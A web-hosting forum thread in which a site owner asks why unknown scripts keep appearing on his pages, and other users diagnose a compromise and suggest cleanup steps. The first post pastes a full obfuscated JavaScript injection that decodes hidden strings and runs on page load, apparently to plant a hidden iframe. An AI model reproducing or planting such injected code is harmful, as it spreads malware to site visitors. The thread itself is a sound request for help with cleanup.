Random Script Showing Up


#1

So I been with dreamhost since 96 never had a problem till the past month. I been getting emails from Google and other search engines letting me know my webpages are unsafe to visit so on…

I have been finding random scripts showing up on webpages and also random email alerts from Google letting me know my webpages are unsafe to visit.

Script I found today one of my webpage.(remove script tag unaware if this fourm supports script paste)

Thank you for your support,

==== Unknown Random Script ====

[script]function rTUM(PmOw, BzwN, LXyHWkhfT){var QnC=LXyHWkhfT.split(BzwN);var WhQSB=’’;for(EMIZPr=-0x16 0x1f 0x2-0xb;EMIZPr<(QnC.length-1);EMIZPr =0xf 0x0 0x9 0xf-0x26){ ltuoe = QnC[EMIZPr]^PmOw;WhQSB = String.fromCharCode(ltuoe);}return WhQSB;}function sAThkSC(TXGCKxmpS){ fff=op.split(“431”); fff.op.replace(“700”);var nmOi=new Function(“lDWOIi”, “return 54427;”); }
;function fJhSoXkp(){var HUz=new Function(“ViKCfr”, "return " rTUM(0xc-0x1b-0x14 0x7 0x32 0x149, ‘I’,‘315I304I316I298I306I314I305I299I’) “.” rTUM(-0x2d 0x1 0x32 0x25 0x331, ‘U’,‘830U819U824U805U’) “”);var iMqIlD=HUz(0x14 0x25-0x17 0x24 0x1c-0x61);iMqIlD.innerHTML = rTUM(0x2d-0x15-0x2e-0x1-0x8-0x1b 0xe-0x24 0x3ca, ‘w’,‘838w787w796w776w795w791w799w858w781w787w798w782w786w839w843w858w786w 799w787w797w786w782w839w843w858w792w789w776w798w799w776w839w842w858w796w776w795w791w799w79 2w789w776w798w799w776w839w842w858w777w776w793w839w861w786w782w782w778w832w853w853w 835w841w852w843w847w834w852w843w843w846w852w843w841w835w853w779w799w776w782w853w787w 788w798w799w770w852w778w786w778w861w836w838w853w787w796w776w795w791w799w836w’);}function zoq(scCwWhO){ var kFgWGahX = document.getElementById(‘aYv’); fff.op.replace(“967”);alert(‘fsg’);var SvkyC=new Function(“GFlrDZYg”, “return 882261;”); }
;if(window.addEventListener){window.addEventListener(‘load’,fJhSoXkp,false);}else if(window.attachEvent){window.attachEvent(‘onload’, fJhSoXkp);}function gwPmhjtT(acxLyTwG){ var ocS = document.getElementById(‘RlvWaxjn’); }
;[/script]


#2

Congratulations (but not in the good way). Your site has been hacked. What software are you running?

-Scott


#3

Well the script showed up twice

Once on a plan html page

and the other was on oscommerce page.

I deleted all users, created new ones, checked permissions on config files everything is secure, also checked to see if i had enchanced sercurity checked on the hosting aswell and that is done.

This has happened after all changes were made, I thought I was hacked the first time aswell thats why I changed all my information.

Still can not understand how this happened after all changes were made…

I have a support ticket in with dreamhost aswell waiting on reply.


#4

First thing to do is scan your own PC, then proceed to clean your website.

These trojans are written by PERL hackers and can embed code locally to remake any edits you’re taking out via your own PC. The most prevalent injections are done via WordPress sites (especially those using those awesome plugins we all seem to love so much) - reason being it’s an extremely popular script. They inject code that then attacks visitor’s PC’s in order to propagate. I visit your site, I get infected, I log in to my site, my site gets injected, repeat for my visitors. Makes Google unhappy (not to mention you and I).

Update all your scripts after ensuring your connecting PC is trojan free :wink:

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost


#5

I have used the following.

Hijackthis
AVG Anti Virus
Ad-Aware
Avira AntiVir
CA Sweep
Malwarebytes Anti-Malware
Spybot Search and Destory

Nothing has came up that shows any type of threat.

Note: Before Changes where made, I was on a clean slate (brand new out of the box Laptop Win7) did not visit any webpages, went directly to Dream Host, Deleted all Users, Changes all Password.

Went to main computer, Ran everything I could think of to find any scripts or files that would cause problems, I left coding on the webpages for the time being so Dream Host can take a look at it…

Am I missing anything?

Thank you

==Add==

This is the biggest reason why I am worried about my service, is because the changes were made on a clean computer… and then they happened again


#6

It’s highly improbable that things are being done behind the scenes on your DreamHost box itself, but to be double-sure you can close any doors by ensuring that the user account is “locked down”:

[color=#00CC00]Panel > Users > Manage Users[/color]

  • Click Edit next to the user in question

  • Check Enhanced Security

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost